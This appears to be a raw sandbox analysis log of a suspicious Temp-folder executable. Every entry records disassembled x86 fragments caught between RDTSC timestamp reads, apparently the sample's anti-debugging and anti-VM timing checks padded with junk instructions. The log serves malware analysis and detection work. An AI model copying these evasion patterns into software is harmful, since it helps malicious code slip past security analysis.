Source: C:\Users\user\AppData\Local\TempRWMTG43DTVMTTDIWY4OCDKH8MIBDMSKV.EXE	RDTSC instruction interceptor: First address: B7A72F second address: B7A73C instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 popad 0x00000007 pushad 0x00000008 push edx 0x00000009 pushad 0x0000000a popad 0x0000000b push eax 0x0000000c push edx 0x0000000d rdtsc
Source: C:\Users\user\AppData\Local\TempRWMTG43DTVMTTDIWY4OCDKH8MIBDMSKV.EXE	RDTSC instruction interceptor: First address: B7A73C second address: B7A771 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 push esi 0x00000006 jmp 00007F1144C8B197h 0x0000000b pop esi 0x0000000c jnc 00007F1144C8B18Ch 0x00000012 pushad 0x00000013 push ebx 0x00000014 pop ebx 0x00000015 jbe 00007F1144C8B186h 0x0000001b push eax 0x0000001c push edx 0x0000001d rdtsc
Source: C:\Users\user\AppData\Local\TempRWMTG43DTVMTTDIWY4OCDKH8MIBDMSKV.EXE	RDTSC instruction interceptor: First address: B7F60A second address: B7F633 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 push eax 0x00000006 push edx 0x00000007 jmp 00007F114478E742h 0x0000000c jmp 00007F114478E740h 0x00000011 rdtsc
Source: C:\Users\user\AppData\Local\TempRWMTG43DTVMTTDIWY4OCDKH8MIBDMSKV.EXE	RDTSC instruction interceptor: First address: B7F633 second address: B7F637 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\AppData\Local\TempRWMTG43DTVMTTDIWY4OCDKH8MIBDMSKV.EXE	RDTSC instruction interceptor: First address: B83725 second address: B8373A instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F114478E73Dh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 push edi 0x0000000a push eax 0x0000000b pop eax 0x0000000c pop edi 0x0000000d rdtsc
Source: C:\Users\user\AppData\Local\TempRWMTG43DTVMTTDIWY4OCDKH8MIBDMSKV.EXE	RDTSC instruction interceptor: First address: B8373A second address: B83769 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push eax 0x00000004 pop eax 0x00000005 pop eax 0x00000006 jmp 00007F1144C8B192h 0x0000000b pop edx 0x0000000c pop eax 0x0000000d pushad 0x0000000e pushad 0x0000000f jo 00007F1144C8B186h 0x00000015 jnl 00007F1144C8B186h 0x0000001b pushad 0x0000001c popad 0x0000001d popad 0x0000001e push eax 0x0000001f push edx 0x00000020 push eax 0x00000021 push edx 0x00000022 rdtsc
Source: C:\Users\user\AppData\Local\TempRWMTG43DTVMTTDIWY4OCDKH8MIBDMSKV.EXE	RDTSC instruction interceptor: First address: B83769 second address: B8377D instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007F114478E740h 0x00000009 rdtsc
Source: C:\Users\user\AppData\Local\TempRWMTG43DTVMTTDIWY4OCDKH8MIBDMSKV.EXE	RDTSC instruction interceptor: First address: B8377D second address: B83783 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\AppData\Local\TempRWMTG43DTVMTTDIWY4OCDKH8MIBDMSKV.EXE	RDTSC instruction interceptor: First address: B83783 second address: B8379E instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push eax 0x00000007 push edx 0x00000008 jmp 00007F114478E743h 0x0000000d rdtsc
Source: C:\Users\user\AppData\Local\TempRWMTG43DTVMTTDIWY4OCDKH8MIBDMSKV.EXE	RDTSC instruction interceptor: First address: B82A02 second address: B82A08 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\AppData\Local\TempRWMTG43DTVMTTDIWY4OCDKH8MIBDMSKV.EXE	RDTSC instruction interceptor: First address: B82A08 second address: B82A10 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 pop eax 0x00000006 push eax 0x00000007 push edx 0x00000008 rdtsc
Source: C:\Users\user\AppData\Local\TempRWMTG43DTVMTTDIWY4OCDKH8MIBDMSKV.EXE	RDTSC instruction interceptor: First address: B82A10 second address: B82A15 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 rdtsc
Source: C:\Users\user\AppData\Local\TempRWMTG43DTVMTTDIWY4OCDKH8MIBDMSKV.EXE	RDTSC instruction interceptor: First address: B82BB5 second address: B82BCB instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edi 0x00000005 pushad 0x00000006 push edi 0x00000007 pop edi 0x00000008 jmp 00007F114478E73Ch 0x0000000d push eax 0x0000000e push edx 0x0000000f rdtsc
Source: C:\Users\user\AppData\Local\TempRWMTG43DTVMTTDIWY4OCDKH8MIBDMSKV.EXE	RDTSC instruction interceptor: First address: B82BCB second address: B82BD0 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 rdtsc
Source: C:\Users\user\AppData\Local\TempRWMTG43DTVMTTDIWY4OCDKH8MIBDMSKV.EXE	RDTSC instruction interceptor: First address: B83167 second address: B83171 instructions: 0x00000000 rdtsc 0x00000002 jne 00007F114478E736h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a rdtsc
Source: C:\Users\user\AppData\Local\TempRWMTG43DTVMTTDIWY4OCDKH8MIBDMSKV.EXE	RDTSC instruction interceptor: First address: B83171 second address: B8317E instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 jno 00007F1144C8B186h 0x00000009 push esi 0x0000000a pop esi 0x0000000b push eax 0x0000000c push edx 0x0000000d rdtsc
Source: C:\Users\user\AppData\Local\TempRWMTG43DTVMTTDIWY4OCDKH8MIBDMSKV.EXE	RDTSC instruction interceptor: First address: B833ED second address: B83409 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jbe 00007F114478E736h 0x0000000a pop edx 0x0000000b jno 00007F114478E741h 0x00000011 rdtsc
Source: C:\Users\user\AppData\Local\TempRWMTG43DTVMTTDIWY4OCDKH8MIBDMSKV.EXE	RDTSC instruction interceptor: First address: B83409 second address: B8340E instructions: 0x00000000 rdtsc 0x00000002 push ebx 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
Source: C:\Users\user\AppData\Local\TempRWMTG43DTVMTTDIWY4OCDKH8MIBDMSKV.EXE	RDTSC instruction interceptor: First address: B8BE93 second address: B8BEAC instructions: 0x00000000 rdtsc 0x00000002 jne 00007F114478E736h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a push eax 0x0000000b push edx 0x0000000c jmp 00007F114478E73Dh 0x00000011 rdtsc
Source: C:\Users\user\AppData\Local\TempRWMTG43DTVMTTDIWY4OCDKH8MIBDMSKV.EXE	RDTSC instruction interceptor: First address: B8C182 second address: B8C186 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\AppData\Local\TempRWMTG43DTVMTTDIWY4OCDKH8MIBDMSKV.EXE	RDTSC instruction interceptor: First address: B8C2F0 second address: B8C310 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F114478E73Ah 0x00000007 pop edx 0x00000008 pop eax 0x00000009 push eax 0x0000000a push edx 0x0000000b jmp 00007F114478E73Eh 0x00000010 push eax 0x00000011 push edx 0x00000012 rdtsc
Source: C:\Users\user\AppData\Local\TempRWMTG43DTVMTTDIWY4OCDKH8MIBDMSKV.EXE	RDTSC instruction interceptor: First address: B8C310 second address: B8C314 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\AppData\Local\TempRWMTG43DTVMTTDIWY4OCDKH8MIBDMSKV.EXE	RDTSC instruction interceptor: First address: B8C480 second address: B8C486 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\AppData\Local\TempRWMTG43DTVMTTDIWY4OCDKH8MIBDMSKV.EXE	RDTSC instruction interceptor: First address: B8C486 second address: B8C494 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop ecx 0x00000005 pushad 0x00000006 pushad 0x00000007 popad 0x00000008 pushad 0x00000009 popad 0x0000000a pushad 0x0000000b popad 0x0000000c push eax 0x0000000d push edx 0x0000000e rdtsc
Source: C:\Users\user\AppData\Local\TempRWMTG43DTVMTTDIWY4OCDKH8MIBDMSKV.EXE	RDTSC instruction interceptor: First address: B8CFAD second address: B8CFB1 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\AppData\Local\TempRWMTG43DTVMTTDIWY4OCDKH8MIBDMSKV.EXE	RDTSC instruction interceptor: First address: B8CFB1 second address: B8CFED instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 jbe 00007F1144C8B196h 0x0000000c jmp 00007F1144C8B198h 0x00000011 jl 00007F1144C8B192h 0x00000017 push eax 0x00000018 push edx 0x00000019 rdtsc
Source: C:\Users\user\AppData\Local\TempRWMTG43DTVMTTDIWY4OCDKH8MIBDMSKV.EXE	RDTSC instruction interceptor: First address: B8D748 second address: B8D75D instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 ja 00007F114478E736h 0x0000000a pop edi 0x0000000b push eax 0x0000000c push edx 0x0000000d jnl 00007F114478E736h 0x00000013 push edx 0x00000014 pop edx 0x00000015 rdtsc
Source: C:\Users\user\AppData\Local\TempRWMTG43DTVMTTDIWY4OCDKH8MIBDMSKV.EXE	RDTSC instruction interceptor: First address: B8D75D second address: B8D79E instructions: 0x00000000 rdtsc 0x00000002 jne 00007F1144C8B186h 0x00000008 jl 00007F1144C8B186h 0x0000000e pop edx 0x0000000f pop eax 0x00000010 popad 0x00000011 pushad 0x00000012 jno 00007F1144C8B192h 0x00000018 pushad 0x00000019 jmp 00007F1144C8B196h 0x0000001e pushad 0x0000001f popad 0x00000020 push ebx 0x00000021 pop ebx 0x00000022 push eax 0x00000023 push edx 0x00000024 rdtsc
Source: C:\Users\user\AppData\Local\TempRWMTG43DTVMTTDIWY4OCDKH8MIBDMSKV.EXE	RDTSC instruction interceptor: First address: B8D79E second address: B8D7A6 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 push ecx 0x00000006 push eax 0x00000007 push edx 0x00000008 rdtsc
Source: C:\Users\user\AppData\Local\TempRWMTG43DTVMTTDIWY4OCDKH8MIBDMSKV.EXE	RDTSC instruction interceptor: First address: B8B5F6 second address: B8B5FC instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\AppData\Local\TempRWMTG43DTVMTTDIWY4OCDKH8MIBDMSKV.EXE	RDTSC instruction interceptor: First address: B9401F second address: B94028 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 push eax 0x00000006 push edx 0x00000007 pushad 0x00000008 popad 0x00000009 rdtsc
Source: C:\Users\user\AppData\Local\TempRWMTG43DTVMTTDIWY4OCDKH8MIBDMSKV.EXE	RDTSC instruction interceptor: First address: B93D72 second address: B93D77 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 rdtsc
Source: C:\Users\user\AppData\Local\TempRWMTG43DTVMTTDIWY4OCDKH8MIBDMSKV.EXE	RDTSC instruction interceptor: First address: B93D77 second address: B93D81 instructions: 0x00000000 rdtsc 0x00000002 push ebx 0x00000003 pushad 0x00000004 popad 0x00000005 pop ebx 0x00000006 push eax 0x00000007 push edx 0x00000008 pushad 0x00000009 popad 0x0000000a rdtsc
Source: C:\Users\user\AppData\Local\TempRWMTG43DTVMTTDIWY4OCDKH8MIBDMSKV.EXE	RDTSC instruction interceptor: First address: B93D81 second address: B93D87 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\AppData\Local\TempRWMTG43DTVMTTDIWY4OCDKH8MIBDMSKV.EXE	RDTSC instruction interceptor: First address: B95682 second address: B95686 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\AppData\Local\TempRWMTG43DTVMTTDIWY4OCDKH8MIBDMSKV.EXE	RDTSC instruction interceptor: First address: AD7F6C second address: AD7F82 instructions: 0x00000000 rdtsc 0x00000002 jng 00007F1144C8B186h 0x00000008 ja 00007F1144C8B186h 0x0000000e pop edx 0x0000000f pop eax 0x00000010 push eax 0x00000011 push edx 0x00000012 push eax 0x00000013 push edx 0x00000014 push edx 0x00000015 pop edx 0x00000016 rdtsc
Source: C:\Users\user\AppData\Local\TempRWMTG43DTVMTTDIWY4OCDKH8MIBDMSKV.EXE	RDTSC instruction interceptor: First address: AD7F82 second address: AD7FB3 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F114478E73Ch 0x00000007 jmp 00007F114478E73Ch 0x0000000c pop edx 0x0000000d pop eax 0x0000000e jmp 00007F114478E745h 0x00000013 rdtsc
Source: C:\Users\user\AppData\Local\TempRWMTG43DTVMTTDIWY4OCDKH8MIBDMSKV.EXE	RDTSC instruction interceptor: First address: BA5E0A second address: BA5E44 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F1144C8B197h 0x00000007 push esi 0x00000008 push ebx 0x00000009 pop ebx 0x0000000a pop esi 0x0000000b pop edx 0x0000000c pop eax 0x0000000d pushad 0x0000000e push eax 0x0000000f push edx 0x00000010 jmp 00007F1144C8B198h 0x00000015 rdtsc
Source: C:\Users\user\AppData\Local\TempRWMTG43DTVMTTDIWY4OCDKH8MIBDMSKV.EXE	RDTSC instruction interceptor: First address: BB4428 second address: BB442D instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 rdtsc
Source: C:\Users\user\AppData\Local\TempRWMTG43DTVMTTDIWY4OCDKH8MIBDMSKV.EXE	RDTSC instruction interceptor: First address: BB442D second address: BB444B instructions: 0x00000000 rdtsc 0x00000002 jnl 00007F1144C8B198h 0x00000008 push eax 0x00000009 push edx 0x0000000a pushad 0x0000000b popad 0x0000000c rdtsc
Source: C:\Users\user\AppData\Local\TempRWMTG43DTVMTTDIWY4OCDKH8MIBDMSKV.EXE	RDTSC instruction interceptor: First address: BB9395 second address: BB939A instructions: 0x00000000 rdtsc 0x00000002 push edx 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
Source: C:\Users\user\AppData\Local\TempRWMTG43DTVMTTDIWY4OCDKH8MIBDMSKV.EXE	RDTSC instruction interceptor: First address: BC2FF7 second address: BC2FFB instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\AppData\Local\TempRWMTG43DTVMTTDIWY4OCDKH8MIBDMSKV.EXE	RDTSC instruction interceptor: First address: BC2FFB second address: BC2FFF instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\AppData\Local\TempRWMTG43DTVMTTDIWY4OCDKH8MIBDMSKV.EXE	RDTSC instruction interceptor: First address: BC2FFF second address: BC3007 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push ecx 0x00000005 pop ecx 0x00000006 pop edx 0x00000007 pop eax 0x00000008 rdtsc
Source: C:\Users\user\AppData\Local\TempRWMTG43DTVMTTDIWY4OCDKH8MIBDMSKV.EXE	RDTSC instruction interceptor: First address: BC19E0 second address: BC19FC instructions: 0x00000000 rdtsc 0x00000002 push edx 0x00000003 jne 00007F114478E736h 0x00000009 pop edx 0x0000000a pushad 0x0000000b jmp 00007F114478E73Fh 0x00000010 push eax 0x00000011 push edx 0x00000012 rdtsc
Source: C:\Users\user\AppData\Local\TempRWMTG43DTVMTTDIWY4OCDKH8MIBDMSKV.EXE	RDTSC instruction interceptor: First address: BC19FC second address: BC1A02 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\AppData\Local\TempRWMTG43DTVMTTDIWY4OCDKH8MIBDMSKV.EXE	RDTSC instruction interceptor: First address: BC2130 second address: BC2134 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\AppData\Local\TempRWMTG43DTVMTTDIWY4OCDKH8MIBDMSKV.EXE	RDTSC instruction interceptor: First address: BC2134 second address: BC213A instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\AppData\Local\TempRWMTG43DTVMTTDIWY4OCDKH8MIBDMSKV.EXE	RDTSC instruction interceptor: First address: BC213A second address: BC215B instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 jmp 00007F114478E746h 0x00000008 jng 00007F114478E736h 0x0000000e push eax 0x0000000f push edx 0x00000010 rdtsc
Source: C:\Users\user\AppData\Local\TempRWMTG43DTVMTTDIWY4OCDKH8MIBDMSKV.EXE	RDTSC instruction interceptor: First address: BC215B second address: BC216D instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 pop edx 0x00000006 pop eax 0x00000007 jns 00007F1144C8B19Bh 0x0000000d push edx 0x0000000e pushad 0x0000000f popad 0x00000010 push eax 0x00000011 push edx 0x00000012 rdtsc
Source: C:\Users\user\AppData\Local\TempRWMTG43DTVMTTDIWY4OCDKH8MIBDMSKV.EXE	RDTSC instruction interceptor: First address: BC5906 second address: BC592E instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push esi 0x00000005 jmp 00007F114478E745h 0x0000000a jnl 00007F114478E736h 0x00000010 pop esi 0x00000011 pushad 0x00000012 push eax 0x00000013 push edx 0x00000014 push ecx 0x00000015 pop ecx 0x00000016 push eax 0x00000017 push edx 0x00000018 rdtsc
Source: C:\Users\user\AppData\Local\TempRWMTG43DTVMTTDIWY4OCDKH8MIBDMSKV.EXE	RDTSC instruction interceptor: First address: BC592E second address: BC5932 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\AppData\Local\TempRWMTG43DTVMTTDIWY4OCDKH8MIBDMSKV.EXE	RDTSC instruction interceptor: First address: BC5932 second address: BC594E instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F114478E744h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 push eax 0x0000000a push edx 0x0000000b push ecx 0x0000000c pop ecx 0x0000000d rdtsc
Source: C:\Users\user\AppData\Local\TempRWMTG43DTVMTTDIWY4OCDKH8MIBDMSKV.EXE	RDTSC instruction interceptor: First address: BE3A0D second address: BE3A15 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push ecx 0x00000005 pop ecx 0x00000006 push eax 0x00000007 push edx 0x00000008 rdtsc
Source: C:\Users\user\AppData\Local\TempRWMTG43DTVMTTDIWY4OCDKH8MIBDMSKV.EXE	RDTSC instruction interceptor: First address: BE3A15 second address: BE3A1D instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 pushad 0x00000006 push eax 0x00000007 push edx 0x00000008 rdtsc
Source: C:\Users\user\AppData\Local\TempRWMTG43DTVMTTDIWY4OCDKH8MIBDMSKV.EXE	RDTSC instruction interceptor: First address: BE3A1D second address: BE3A26 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 push ebx 0x00000007 pop ebx 0x00000008 popad 0x00000009 rdtsc
Source: C:\Users\user\AppData\Local\TempRWMTG43DTVMTTDIWY4OCDKH8MIBDMSKV.EXE	RDTSC instruction interceptor: First address: BE3A26 second address: BE3A5E instructions: 0x00000000 rdtsc 0x00000002 jnp 00007F114478E74Eh 0x00000008 jmp 00007F114478E746h 0x0000000d push esi 0x0000000e pop esi 0x0000000f pop edx 0x00000010 pop eax 0x00000011 pushad 0x00000012 jmp 00007F114478E73Bh 0x00000017 push eax 0x00000018 push edx 0x00000019 jp 00007F114478E736h 0x0000001f push eax 0x00000020 push edx 0x00000021 rdtsc
Source: C:\Users\user\AppData\Local\TempRWMTG43DTVMTTDIWY4OCDKH8MIBDMSKV.EXE	RDTSC instruction interceptor: First address: BE3A5E second address: BE3A62 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\AppData\Local\TempRWMTG43DTVMTTDIWY4OCDKH8MIBDMSKV.EXE	RDTSC instruction interceptor: First address: BE3A62 second address: BE3AA6 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F114478E744h 0x00000007 push edi 0x00000008 pop edi 0x00000009 pop edx 0x0000000a pop eax 0x0000000b jmp 00007F114478E746h 0x00000010 push eax 0x00000011 push edx 0x00000012 jmp 00007F114478E740h 0x00000017 push edi 0x00000018 pop edi 0x00000019 rdtsc
Source: C:\Users\user\AppData\Local\TempRWMTG43DTVMTTDIWY4OCDKH8MIBDMSKV.EXE	RDTSC instruction interceptor: First address: BE3AA6 second address: BE3AAA instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\AppData\Local\TempRWMTG43DTVMTTDIWY4OCDKH8MIBDMSKV.EXE	RDTSC instruction interceptor: First address: BFB5D7 second address: BFB5E1 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 js 00007F114478E736h 0x0000000a rdtsc
Source: C:\Users\user\AppData\Local\TempRWMTG43DTVMTTDIWY4OCDKH8MIBDMSKV.EXE	RDTSC instruction interceptor: First address: BFB5E1 second address: BFB5E9 instructions: 0x00000000 rdtsc 0x00000002 push edx 0x00000003 pop edx 0x00000004 pushad 0x00000005 popad 0x00000006 pop edx 0x00000007 pop eax 0x00000008 rdtsc
Source: C:\Users\user\AppData\Local\TempRWMTG43DTVMTTDIWY4OCDKH8MIBDMSKV.EXE	RDTSC instruction interceptor: First address: BFB8F0 second address: BFB8F6 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\AppData\Local\TempRWMTG43DTVMTTDIWY4OCDKH8MIBDMSKV.EXE	RDTSC instruction interceptor: First address: BFB8F6 second address: BFB8FC instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\AppData\Local\TempRWMTG43DTVMTTDIWY4OCDKH8MIBDMSKV.EXE	RDTSC instruction interceptor: First address: BFB8FC second address: BFB909 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 push eax 0x00000006 push edx 0x00000007 jbe 00007F114478E736h 0x0000000d rdtsc
Source: C:\Users\user\AppData\Local\TempRWMTG43DTVMTTDIWY4OCDKH8MIBDMSKV.EXE	RDTSC instruction interceptor: First address: BFD4BB second address: BFD4CD instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pushad 0x00000005 popad 0x00000006 pop edx 0x00000007 pop eax 0x00000008 push esi 0x00000009 pushad 0x0000000a popad 0x0000000b pop esi 0x0000000c push eax 0x0000000d push edx 0x0000000e pushad 0x0000000f popad 0x00000010 push edx 0x00000011 pop edx 0x00000012 rdtsc
Source: C:\Users\user\AppData\Local\TempRWMTG43DTVMTTDIWY4OCDKH8MIBDMSKV.EXE	RDTSC instruction interceptor: First address: BFD4CD second address: BFD4D1 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\AppData\Local\TempRWMTG43DTVMTTDIWY4OCDKH8MIBDMSKV.EXE	RDTSC instruction interceptor: First address: BFD4D1 second address: BFD4D7 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\AppData\Local\TempRWMTG43DTVMTTDIWY4OCDKH8MIBDMSKV.EXE	RDTSC instruction interceptor: First address: BFD4D7 second address: BFD4E6 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push esi 0x00000007 jc 00007F114478E736h 0x0000000d push eax 0x0000000e push edx 0x0000000f rdtsc
Source: C:\Users\user\AppData\Local\TempRWMTG43DTVMTTDIWY4OCDKH8MIBDMSKV.EXE	RDTSC instruction interceptor: First address: C028D8 second address: C028E5 instructions: 0x00000000 rdtsc 0x00000002 push ecx 0x00000003 pop ecx 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push eax 0x00000007 push eax 0x00000008 push edx 0x00000009 push eax 0x0000000a push edx 0x0000000b pushad 0x0000000c popad 0x0000000d rdtsc
Source: C:\Users\user\AppData\Local\TempRWMTG43DTVMTTDIWY4OCDKH8MIBDMSKV.EXE	RDTSC instruction interceptor: First address: C028E5 second address: C028E9 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\AppData\Local\TempRWMTG43DTVMTTDIWY4OCDKH8MIBDMSKV.EXE	RDTSC instruction interceptor: First address: C028E9 second address: C028EF instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\AppData\Local\TempRWMTG43DTVMTTDIWY4OCDKH8MIBDMSKV.EXE	RDTSC instruction interceptor: First address: C028EF second address: C028F4 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
Source: C:\Users\user\AppData\Local\TempRWMTG43DTVMTTDIWY4OCDKH8MIBDMSKV.EXE	RDTSC instruction interceptor: First address: C02C31 second address: C02C36 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
Source: C:\Users\user\AppData\Local\TempRWMTG43DTVMTTDIWY4OCDKH8MIBDMSKV.EXE	RDTSC instruction interceptor: First address: C02C36 second address: C02C99 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007F114478E746h 0x00000009 popad 0x0000000a pop edx 0x0000000b pop eax 0x0000000c push eax 0x0000000d pushad 0x0000000e pushad 0x0000000f push esi 0x00000010 pop esi 0x00000011 jmp 00007F114478E748h 0x00000016 popad 0x00000017 push ebx 0x00000018 jmp 00007F114478E747h 0x0000001d pop ebx 0x0000001e popad 0x0000001f mov eax, dword ptr [esp+04h] 0x00000023 js 00007F114478E740h 0x00000029 push eax 0x0000002a push edx 0x0000002b pushad 0x0000002c popad 0x0000002d rdtsc
Source: C:\Users\user\AppData\Local\TempRWMTG43DTVMTTDIWY4OCDKH8MIBDMSKV.EXE	RDTSC instruction interceptor: First address: C02C99 second address: C02CAA instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 mov eax, dword ptr [eax] 0x00000008 jp 00007F1144C8B1A7h 0x0000000e pushad 0x0000000f push eax 0x00000010 push edx 0x00000011 rdtsc
Source: C:\Users\user\AppData\Local\TempRWMTG43DTVMTTDIWY4OCDKH8MIBDMSKV.EXE	RDTSC instruction interceptor: First address: C02EBC second address: C02F16 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push ecx 0x00000004 pop ecx 0x00000005 push ebx 0x00000006 pop ebx 0x00000007 popad 0x00000008 pop edx 0x00000009 pop eax 0x0000000a push eax 0x0000000b jne 00007F114478E73Ah 0x00000011 push ecx 0x00000012 push edi 0x00000013 pop edi 0x00000014 pop ecx 0x00000015 nop 0x00000016 push ecx 0x00000017 push ebx 0x00000018 mov edx, 167673E6h 0x0000001d pop edx 0x0000001e pop edx 0x0000001f push dword ptr [ebp+122D254Ch] 0x00000025 push 00000000h 0x00000027 push edx 0x00000028 call 00007F114478E738h 0x0000002d pop edx 0x0000002e mov dword ptr [esp+04h], edx 0x00000032 add dword ptr [esp+04h], 00000018h 0x0000003a inc edx 0x0000003b push edx 0x0000003c ret 0x0000003d pop edx 0x0000003e ret 0x0000003f mov dword ptr [ebp+122D22B7h], esi 0x00000045 push C332A743h 0x0000004a push eax 0x0000004b push edx 0x0000004c je 00007F114478E73Ch 0x00000052 push eax 0x00000053 push edx 0x00000054 rdtsc
Source: C:\Users\user\AppData\Local\TempRWMTG43DTVMTTDIWY4OCDKH8MIBDMSKV.EXE	RDTSC instruction interceptor: First address: C02F16 second address: C02F1A instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
